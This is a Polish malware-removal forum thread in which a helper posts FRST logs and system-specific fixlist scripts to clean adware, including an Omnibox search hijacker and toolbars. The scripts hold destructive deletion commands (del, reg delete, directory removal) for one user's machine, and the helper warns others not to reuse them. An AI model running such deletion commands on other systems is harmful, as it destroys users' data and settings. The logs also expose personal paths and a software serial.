Zostały usunięte logi z OTL, więc temat nie trzyma się kupy, bo powyższe dane były pobierane z programu OTL. Jest tu mnóstwo kont: ==================== Accounts: ============================= ASIA (S-1-5-21-2981973968-1908128720-872019283-1005 - Limited - Enabled) => C:\Users\ASIA Renia (S-1-5-21-2981973968-1908128720-872019283-1003 - Administrator - Enabled) => C:\Users\Renia user (S-1-5-21-2981973968-1908128720-872019283-1000 - Administrator - Enabled) => C:\Users\user Wojo (S-1-5-21-2981973968-1908128720-872019283-1002 - Administrator - Enabled) => C:\Users\Wojo Dostarczone zostały raporty FRST tylko z kontekstu konta Wojo. Wymagane zestawy FRST.txt + Addition.txt z pozostałych kont. Zaloguj się po kolei na każde poprzez pełny restart komputera, a nie opcje Wyloguj czy Przełącz użytkownika, i zrób zestawy. Na koncie limitowanym ASIA FRST należy uruchomić przez dwuklik a nie "Uruchom jako Administrator" (co przestawi kontekst konta).

W raporcie FRST nie widać nic w przeglądarce Google Chrome, co nasuwa wnioski: prawdopodobnie adware zmodyfikowało / zainfekowało któryś globalny plik Google Chrome. 1. Powtórz krok reinstalacji z samego początku tematu: Nie instaluj przeglądarki, dopóki nie zostanie wykonany punkt 2: 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {2C59BAB6-F996-4246-9258-20333B03696A} - \Jelbrus Secure Web Task No Task File RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Google RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox\extensions RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome RemoveDirectory: C:\Users\Kuba\AppData\Local\Google CMD: del /q C:\Users\Kuba\Downloads\adwcleaner*.exe CMD: del /q C:\Users\Kuba\Downloads\Chrome*.exe CMD: del /q C:\Users\Kuba\Downloads\tdsskiller*.exe CMD: del /q C:\Windows\SysWOW64\tasks.dll Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Nastąpi restart i powstanie plik fixlog.txt. 3. Zainstaluj najnowszą wersję Chrome: KLIK. 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Zgłaszasz problem miejsca na załączniki - posłuż się wklej.org, a ja przeniosę pliki do załączników.

Obecnie przekierowania Omnibox widać tylko w Google Chrome. Był tu używany także ComboFix... Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj stare wersje i zbędniki: Adobe Flash Player 16 NPAPI, Adobe Shockwave Player 12.1, Akamai NetSession Interface, Java 7 Update 67, Java 8 Update 25. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR StartupUrls: Default -> "hxxp://www.omniboxes.com/?type=hp&ts=1425494452&from=obw&uid=ST3500413AS_Z2A7FQ7PXXXXZ2A7FQ7P" CHR DefaultSearchKeyword: Default -> omniboxes CHR HKLM-x32\...\Chrome\Extension: [ahllmicjfilnopfmpmokidfabdacfkpi] - C:\ProgramData\Bcool\ahllmicjfilnopfmpmokidfabdacfkpi.crx [Not Found] FF Plugin: @videolan.org/vlc,version=2.0.2 -> C:\Program Files\VideoLAN\VLC\npvlc.dll No File FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll No File FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.21.79\npGoogleUpdate3.dll No File FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.21.79\npGoogleUpdate3.dll No File FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll No File FF Plugin HKU\S-1-5-21-3251776730-861767313-4254609882-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Marek\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll No File HKU\S-1-5-21-3251776730-861767313-4254609882-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-3251776730-861767313-4254609882-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch URLSearchHook: HKLM-x32 - Default Value = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} URLSearchHook: HKU\S-1-5-21-3251776730-861767313-4254609882-1000 - (No Name) - {BC86E1AB-EDA5-4059-938F-CE307B0C6F0A} - No File SearchScopes: HKU\S-1-5-21-3251776730-861767313-4254609882-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = Handler: mso-offdap - {3D9F03FA-7A94-11D3-BE81-0050048385D1} - No File Handler: mso-offdap11 - {32505114-5902-49B2-880A-1F7738E5A384} - No File HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe HKU\S-1-5-21-3251776730-861767313-4254609882-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BasementDuster => ""="service" S3 MEMSWEEP2; C:\Windows\system32\3901.tmp [6144 2009-06-18] (Sophos Plc) [File not signed] U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [35064 2015-03-05] () U3 albxpmi3; No ImagePath S3 andnetadb; System32\Drivers\lgandnetadb.sys [X] S3 AndNetDiag; system32\DRIVERS\lgandnetdiag64.sys [X] S3 ANDNetModem; system32\DRIVERS\lgandnetmodem64.sys [X] S3 andnetndis; system32\DRIVERS\lgandnetndis64.sys [X] S3 appliandMP; system32\DRIVERS\appliand.sys [X] S2 ATE_PROCMON; \??\C:\Program Files (x86)\Anti Trojan Elite\ATEPMon.sys [X] S3 ATSZIO; \??\C:\Program Files (x86)\ASUS\ASUS PC Diagnostics\ATSZIO64.sys [X] S2 BasementDuster; C:\Program Files (x86)\IGS\BasementDuster.exe [X] S3 cleanhlp; \??\C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [X] S3 dgderdrv; System32\drivers\dgderdrv.sys [X] S3 ewusbmbb; system32\DRIVERS\ewusbwwan.sys [X] S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S0 fsned; system32\drivers\bbcqq.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_cdcecm; system32\DRIVERS\ew_jucdcecm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X] S3 hwusbfake; system32\DRIVERS\ewusbfake.sys [X] S3 NDSPCIIO; \??\C:\Windows\system32\DRIVERS\NDSPCIIO64.SYS [X] S3 RTL8192su; system32\DRIVERS\RTL8192su.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] U2 TMAgent; No ImagePath S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 usbbus; system32\DRIVERS\lgx64bus.sys [X] S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X] S3 USBModem; system32\DRIVERS\lgx64modem.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 vserial; System32\DRIVERS\vserial.sys [X] S3 X6va008; \??\C:\Windows\SysWOW64\Drivers\X6va008 [X] S3 X6va011; \??\C:\Windows\SysWOW64\Drivers\X6va011 [X] S0 zhhh; system32\drivers\emeqb.sys [X] Task: {08F20D13-4690-4FC1-91C2-835CA17F784A} - System32\Tasks\{DD2ADB99-A079-4391-ADA9-6304C9F26FFE} => pcalua.exe -a C:\LGE400\USB_Driver\LG_SmartPhone\LGWindowsMobile_USBDriver_WHQL_ML_Ver_1.0.exe -d C:\LGE400\USB_Driver\LG_SmartPhone Task: {17A79EF3-7E4C-4B2D-8C07-E5ED82ADC51C} - System32\Tasks\{02C4D9D8-33BF-49FD-A366-ACA003139FDE} => pcalua.exe -a C:\Users\Marek\Downloads\AutodeskDesignRevSetup(1).exe -d "C:\Program Files (x86)\Mozilla Firefox" Task: {18B249CF-88D6-4CB1-ACB9-3C69326C220D} - System32\Tasks\{D71B946D-AE97-437E-AB40-FE5482C62F72} => pcalua.exe -a H:\RGSC\setup.exe -d H:\RGSC Task: {1C309FD6-D0B9-4B7E-A15A-CE8A743DA69C} - System32\Tasks\{60FEDB73-3B5A-40DA-AAC7-60A4EDAC31BE} => pcalua.exe -a C:\Users\Marek\Desktop\LiveSuitPack_1.11\LiveSuitPack_1.11\drvinstaller_X86.exe -d C:\Users\Marek\Desktop\LiveSuitPack_1.11\LiveSuitPack_1.11 Task: {1E296070-4AE2-476A-B145-BE85FAC337C3} - System32\Tasks\{C9EAA7F7-692B-4B00-AACD-5456C25D86D3} => pcalua.exe -a "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\Setup.exe" -d "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15" Task: {1E633E3B-D70E-429D-8AD9-F4E418841244} - System32\Tasks\{C1105FE9-91FE-46AC-A8B8-2DFED467AAD7} => pcalua.exe -a D:\Setup.exe -d D:\ Task: {206AB8BF-B78C-4E89-86FB-0BA6CE7B5183} - System32\Tasks\{6D8FBAE8-EF73-4C15-ACA2-CF8722532925} => pcalua.exe -a C:\Users\Marek\Downloads\Sims3EP10\Sims3EP10\Sims3EP10Setup.exe -d C:\Users\Marek\Downloads\Sims3EP10\Sims3EP10 Task: {216E8A22-E8F1-4975-8D93-6C2A08326FF4} - System32\Tasks\{953D42B0-83D8-4ED3-B06F-1740FAA41902} => pcalua.exe -a C:\Users\Marek\Downloads\AC9-2172.exe -d "C:\Program Files\Graphisoft\ArchiCAD 15" Task: {222B3FA3-5036-4456-8F50-759401E9518D} - System32\Tasks\{8F129C33-F3CF-40C4-82F8-A713F2562375} => pcalua.exe -a "C:\Program Files (x86)\TornPlusTV_version1.11\UninstallBrw.exe" -d "C:\Program Files (x86)\TornPlusTV_version1.11" Task: {2AD44A90-0CC7-4C22-B8BC-1B030897E43C} - System32\Tasks\{6A0EE277-B121-43EA-8925-CA087E2945B4} => pcalua.exe -a "C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\spolszczenie GTA 4 0.97b.exe" -d "C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV" Task: {30B62D51-C4B5-4CFD-9FCB-5F5B092AD01D} - System32\Tasks\{383F8D4C-6311-46D9-A503-FD199FF77807} => pcalua.exe -a C:\Users\Marek\Downloads\nor4full\nor4full\Setup.exe -d C:\Users\Marek\Downloads\nor4full\nor4full Task: {37C428CC-CA5E-4072-9813-E0D0B23AE4B2} - System32\Tasks\{CAE3FC35-FC83-4925-912A-2AD2184496EB} => pcalua.exe -a "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\ArchiCAD 15-Win64\archive.exe" -d "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\ArchiCAD 15-Win64" Task: {39D8AD39-648D-46E1-9847-A1E1236B4CE1} - System32\Tasks\{0885A0E0-9032-48DD-81D7-269709935185} => pcalua.exe -a "C:\Program Files (x86)\Samsung\Kies\KiesDriverInstaller.exe" -d "C:\Program Files (x86)\Samsung\Kies" Task: {3C97B31E-8B19-47D9-9667-7FD2AD4943A8} - System32\Tasks\{F678BBD6-D866-4504-8B20-6D7C6119EA68} => pcalua.exe -a "C:\Users\Marek\Documents\Archicad 15 pl\ArchiCAD 15\ArchiCAD 15-Win64\Setup.exe" -d "C:\Users\Marek\Documents\Archicad 15 pl\ArchiCAD 15\ArchiCAD 15-Win64" Task: {49C1EE6F-0F20-4775-A860-2C8026BEBC5B} - \hdtotal1.3-chromeinstaller No Task File Task: {4CF90ABA-19FB-413A-8C5E-5FC47F0BBC5E} - System32\Tasks\{C93A41AD-E21C-4768-B432-632ECAA6846D} => pcalua.exe -a C:\Users\Marek\Downloads\Second_Life_Setup.exe -d "C:\Program Files (x86)\Mozilla Firefox" Task: {50CC78FF-6186-4524-AE7F-1A9DB5AEEC14} - System32\Tasks\{CAB4599B-DBE6-4E9F-B6F0-34442F762910} => pcalua.exe -a "C:\Program Files (x86)\Samsung\Kies\KiesDriverInstaller.exe" -d "C:\Program Files (x86)\Samsung\Kies" Task: {52BE1C64-C26E-4EDD-8A88-192DDF37D836} - System32\Tasks\{6AA1B680-C346-4410-AD1F-11DDE7B0B54F} => C:\Program Files (x86)\Concilio\ProjectFuture\projectfuture.exe Task: {68D8FBC5-8C7E-4CDD-8041-B7729B18CB87} - System32\Tasks\{D3FCEDEB-8DB0-4D98-B3C8-3CB9D39BA019} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{974C4B12-4D02-4879-85E0-61C95CC63E9E}\setup.exe" -c -runfromtemp -l0x0015 -removeonly Task: {6A7EE5EA-8184-4B70-8B05-44CFF1AA9626} - System32\Tasks\{1EE6F774-B12D-40EF-B995-754B3D224B7F} => pcalua.exe -a C:\Users\Marek\Downloads\Flash_Disinfector.exe -d "C:\Program Files (x86)\Mozilla Firefox" Task: {6E4DE8AC-987B-4017-9CAC-43C5B59E99D5} - System32\Tasks\{CE222A91-2952-46BC-A751-725498793F43} => pcalua.exe -a C:\instalatory\programy\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\install\setup.exe -d C:\instalatory\programy\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\install Task: {795CA726-7113-41F0-A020-CF4CD47922CD} - System32\Tasks\Launch HTC Sync Loader => C:\Program Files (x86)\HTC\HTC Sync 3.0\htcUPCTLoader.exe Task: {7B4F158A-F0AE-4052-9511-C5C5D180539E} - System32\Tasks\{5189E901-8899-4B9D-B02F-CF518C04C5C3} => pcalua.exe -a "C:\instalatory\programy\stery do tv\DirectX\dx9install.exe" -d "C:\instalatory\programy\stery do tv\DirectX" Task: {8193B431-08A2-4A89-808C-72922A8D47B9} - System32\Tasks\{95D927FD-4B7B-44C3-9ED6-D7ED9E8C169E} => Firefox.exe http://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsMain Task: {829C5D4A-1897-4FA0-BE7E-933D7FE33968} - \hdtotal1.3-enabler No Task File Task: {83EFCDAA-CCBF-4A62-86E9-C79BEF057324} - System32\Tasks\{C3ABCCEE-F216-4136-AE4D-9DB02F53ABAE} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="2M0K-K085-4W59-U5LW-585P-W083-MM85-1Z8L-257X-66XA-TC3T-K1M8-3204-2A2C-5T2C-2408-4W3C-6482" Task: {84101856-1EB2-4C0F-9D1C-FA165785B408} - System32\Tasks\{1C79DFE8-4301-4BDE-940C-40257101A229} => pcalua.exe -a "C:\Program Files (x86)\Combined Community Codec Pack\Filters\madVR\InstallFilter.exe" -d "C:\Program Files (x86)\Combined Community Codec Pack\Filters\madVR" Task: {871187CE-ADA5-41F2-9E00-4B727DF9C226} - System32\Tasks\{57573279-914B-4833-8628-F5CCD446E132} => pcalua.exe -a "C:\Program Files (x86)\HDDGURU LLF Tool\unins000.exe" -d "C:\Program Files (x86)\HDDGURU LLF Tool" Task: {8CE9278D-FAB4-4F5E-8D8F-DE014B6227D5} - \hdtotal1.3-codedownloader No Task File Task: {9E23C915-11AD-47F4-9EC5-1C1363838720} - System32\Tasks\{55445773-79E0-4EC3-8CC8-AD3A3A0B0BE9} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{7E19B002-4CA3-4C9F-BA92-91D101B97219}\setup.exe" -c -runfromtemp -l0x0009 -removeonly Task: {A5B4CED1-8847-4194-B001-DCD3F75B6C51} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3251776730-861767313-4254609882-1000 Task: {B05B7162-F070-412A-AF43-BA342DC153A0} - System32\Tasks\{6703D721-F800-4CF7-BC1D-22F39B830235} => pcalua.exe -a "Q:\gry i programy\antymalware\sar_15_sfx.exe" -d "Q:\gry i programy\antymalware" Task: {B466D0BA-E4B2-4534-BF37-D1D396F68473} - \hdtotal1.3-updater No Task File Task: {C373681C-C9C1-4370-BC5F-9A1A6EEF73CE} - System32\Tasks\{A34D8324-5C67-4278-9C18-5CBCCCD9DEDC} => C:\Program Files (x86)\Concilio\ProjectFuture\projectfuture.exe Task: {C8FE7D71-7FA1-4746-B05A-1541F1E0DBA6} - System32\Tasks\{EBC13C0C-79CD-4675-8E05-4CCC9FC40977} => pcalua.exe -a "C:\Program Files (x86)\The SIMS 4 Deluxe Edition\__Installer\vp6\vp6install.exe" -d "C:\Program Files (x86)\The SIMS 4 Deluxe Edition\__Installer\vp6" Task: {CA3E3153-A271-4414-91BB-ECBDC4DAFE69} - System32\Tasks\{5852168C-8337-4D69-90AA-8864BF9D5495} => C:\Program Files (x86)\Dziobas Rar Player\DziobasPlayer.exe Task: {CC549727-BE44-4552-A46A-8A4F3659E141} - System32\Tasks\{44E91F80-513D-432F-A858-BE58D06BB4AF} => C:\Program Files (x86)\iPlus\iPlusManager.exe Task: {CD74A4A6-3202-493A-A828-D5F442A7E883} - System32\Tasks\{D5616665-48F2-461B-A18D-D43DECEFDDFF} => pcalua.exe -a D:\Portable.Adobe.Photoshop.CS4-PL\PhotoshopPortable.exe -d D:\Portable.Adobe.Photoshop.CS4-PL Task: {CE8A146F-3D1A-4F84-BED8-BA7BCACAEE54} - System32\Tasks\{381A7BB8-1770-4944-ACD0-8D1B7E534A1C} => C:\Program Files (x86)\KryptoANSI\KryptoANSI.exe Task: {D39596FD-E820-4EFE-BAE2-005F461306C4} - System32\Tasks\{D8220155-1EC4-4B00-A4EF-64752FFCAFED} => C:\Program Files (x86)\KryptoANSI\KryptoANSI.exe Task: {D667EBB4-E48B-4B66-BB4B-496102BBC695} - System32\Tasks\{6F9F6ACA-2BC2-4169-93D1-7F019752CE16} => pcalua.exe -a "C:\Program Files (x86)\Combined Community Codec Pack\madVR\InstallFilter.exe" -d "C:\Program Files (x86)\Combined Community Codec Pack\madVR" Task: {D8FF207C-78C8-4BBB-BFDD-342028082D87} - System32\Tasks\{78902D5B-13CF-4C59-B0DF-3624594BB45D} => pcalua.exe -a "C:\Program Files (x86)\Audials\Audials 10\AudialsWebInstaller.exe" -d "C:\Program Files (x86)\Audials\Audials 10" Task: {DF528FED-40A0-4A34-89CB-A436FD65DB76} - \PandaUSBVaccine No Task File Task: {E0282C77-C540-4C52-9BA4-03F56A712122} - System32\Tasks\{AAA19B20-6EFF-4158-821D-E2B361A1A2BB} => pcalua.exe -a "C:\Program Files (x86)\Torntv V9.0\Uninstall.exe" -c /fromcontrolpanel=1 Task: {E2D6CF48-73EC-4BA5-BFFA-3033906C2823} - \hdtotal1.3-firefoxinstaller No Task File Task: {E2DF7DB9-8D61-4709-A525-F3D94CE22F29} - System32\Tasks\{B7C0AE89-C6B8-4ADD-BD70-16D27A2821BC} => pcalua.exe -a I:\wyk\Instaluj.exe -d I:\wyk Task: {E3834461-5543-4ADF-8CE8-92888A82D2EB} - System32\Tasks\{234B74DB-ADB2-4535-8CFA-0BCD5742312C} => C:\instalatory\programy\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\install\setup.exe Task: {E5E98EA4-CC59-42AD-9ED4-E4EAA13E9B01} - System32\Tasks\{541C7703-F1EA-4FC1-8BE2-CCE302FC9AD3} => pcalua.exe -a C:\Users\Marek\Downloads\PhotoScapeSetup_V3.0.exe -d "C:\Program Files (x86)\Mozilla Firefox" Task: {E9007F25-D992-476B-BF50-E27FCFDED0E3} - System32\Tasks\{F7AE00DC-16D0-4D81-855B-3DC19C25CC8E} => pcalua.exe -a "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\ArchiCAD 15-Win64\Setup.exe" -d "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\ArchiCAD 15-Win64" Task: {FAA9AB2A-9D4D-4D36-8E4D-DA25EE666D07} - System32\Tasks\{E89746D9-5A43-4694-BBC0-5726DB179D8D} => pcalua.exe -a C:\Users\Marek\Fasttrack.Schedule.10.0.1.Build.5000-ENGiNE\Fasttrack.Schedule.10.0.1.Build.5000-ENGiNE\FastTrack_Schedule_10_Install.exe -d C:\Users\Marek\Fasttrack.Schedule.10.0.1.Build.5000-ENGiNE\Fasttrack.Schedule.10.0.1.Build.5000-ENGiNE C:\ProgramData\bdinstall.bin C:\ProgramData\svcnet2.cfg C:\ProgramData\svcnet2.inc C:\ProgramData\svcnet2.txt C:\ProgramData\Malwarebytes Anti-Exploit C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GRID 2.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AquaSoft C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Counter-Strike 1.6 v23 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Disney Interactive Studios C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HDD Low Level Format Tool C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MegaDev C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mr DJ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nero C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NSS C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Planista 6.3 demo C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Planista 6.5 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Planista BD 2008 edukacyjny C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Szkola podstawowa klasa 4-6 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Szkola podstawowa klasa 5 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoMate C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Tanks C:\ProgramData\Orbit C:\Users\Marek\storage.dat C:\Users\Marek\AppData\Local\BvCVTAfEFLcTfo5q2WAdGHVdWD496UF3Ia1 C:\Users\Marek\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Marek\AppData\Local\setup.txt C:\Users\Marek\AppData\Roaming\bitlord_log.txt C:\Users\Marek\AppData\Roaming\PT C:\Users\Marek\AppData\Roaming\VJ C:\Users\Marek\AppData\Roaming\WUUQGY C:\Users\Marek\AppData\Roaming\ZNJT C:\Users\Marek\AppData\Roaming\Autodesk\AutoCAD 2012 - English C:\Users\Marek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Nero StartSmart Essentials.lnk C:\Users\Marek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Orbit.lnk C:\Users\Marek\AppData\Roaming\Microsoft\Office\Niedawny\*.LNK C:\Users\Marek\AppData\Roaming\Microsoft\Windows\SendTo\Dokumenty na Marek Urządzenie.LNK C:\Users\Marek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url C:\Users\Marek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft C:\Users\Marek\AppData\Roaming\Microsoft\Word\Dok3304048411848414037\Dok3.docx.lnk C:\Users\Marek\AppData\Roaming\Orbit C:\Users\Marek\AppData\Roaming\Origin\update.vbe C:\Users\Marek\Desktop\Emilka\Muzyka Emilki\Sigma - Nobody To Love.mp3 — skrót.lnk C:\Users\Marek\Desktop\Pulpit\Assassin's Creed IV - Black Flag.lnk C:\Users\Marek\Desktop\Pulpit\Borderlands 2.lnk C:\Users\Marek\Desktop\Pulpit\FlashGet3.lnk C:\Users\Marek\Desktop\Pulpit\Grand Theft Auto IV.lnk C:\Users\Marek\Desktop\Renualda Emilson\stare.lnk C:\Users\Marek\Desktop\Renualda Emilson\taniec.lnk C:\Users\Marek\Documents\Inventor Server x64 AutoCAD 2012 Language Pack - English\Default.ipj.lnk C:\Users\Marek\Graphisoft\BIMx dla ArchiCADa 15.lnk C:\Users\Marek\Saved Games\League of Legends\League of Legends.lnk C:\Users\Marek\tadeusza\Documents\Open_Workbench_tutorial.pdf — skrót.lnk C:\Users\Marek\tadeusza\at nie dotykać\w_prot+koszt_firmy\URB\urb_twarda\CDBurnerXP.lnk C:\Windows\system32\3901.tmp C:\Windows\system32\BasementDusterOff.ini C:\Windows\system32\Drivers\2785510A.sys C:\Windows\system32\Drivers\TrueSight.sys C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 C:\Windows\SysWOW64\BasementDuster.ini C:\Windows\SysWOW64\BasementDusterOff.ini Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy omniboxes oraz inne niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition. Dołącz też plik fixlog.txt.

Plik FRST.txt przeniosłam do załączników. Problem hiperlinków miał zostać usunięty już zadanymi działaniami... Obecnie w raportach brak jakichkolwiek oznak czynnego adware (do korekty będą tylko drobnostki), tak więc w której przeglądarce są te podkreślenia?

Prócz wspominanego śmiecia są i inne problemy widoczne. Wykonaj: 1. Przez Panel sterowania odinstaluj: - Adware/PUP: Ace Stream Media 2.1.10.2, AVG Nation toolbar, Dealio Toolbar v10.0, File Type Advisor 1.4, WSE_Binkiland. Tak, Ace Stream Media to instalacja o cechach adware: KLIK. - Stare wersje i zbędniki: Adobe Flash Player 14 ActiveX, Adobe Flash Player 14 Plugin, Adobe Reader X (10.1.10) - Polish, Logitech Desktop Messenger, Macromedia Flash Player 8, Macromedia Flash Player 8 Plugin, MyFreeCodec. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 Updater Service for StartNow Toolbar; C:\Program Files (x86)\StartNow Toolbar\ToolbarUpdaterService.exe [265952 2012-06-22] () R1 wStLib64; C:\Windows\System32\drivers\wStLib64.sys [61120 2014-03-22] (StdLib) S1 ArcCtrl; system32\drivers\ArcCtrl.sys [X] U3 BcmSqlStartupSvc; No ImagePath U2 CLKMSVC10_3A60B698; No ImagePath U2 CLKMSVC10_C3B3B687; No ImagePath U2 DriverService; No ImagePath U2 iATAgentService; No ImagePath U2 idealife Update Service; No ImagePath U3 IGRS; No ImagePath U2 IviRegMgr; No ImagePath S3 massfilter; system32\DRIVERS\massfilter.sys [X] S3 NUMARK_OMNICONTROL; System32\Drivers\nkc2_usb.sys [X] S3 NUMARK_OMNICONTROL_MIDI; system32\drivers\nkc2midi.sys [X] S3 NUMARK_OMNICONTROL_WDM; system32\drivers\nkc2_wdm.sys [X] U2 nvUpdatusService; No ImagePath U2 Oasis2Service; No ImagePath U2 PCCarerService; No ImagePath U2 ReadyComm.DirectRouter; No ImagePath U2 RichVideo; No ImagePath U2 RtLedService; No ImagePath U2 SeaPort; No ImagePath U2 SoftwareService; No ImagePath U3 SQLWriter; No ImagePath U2 Stereo Service; No ImagePath S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X] S3 ZTEusbnet; system32\DRIVERS\ZTEusbnet.sys [X] S3 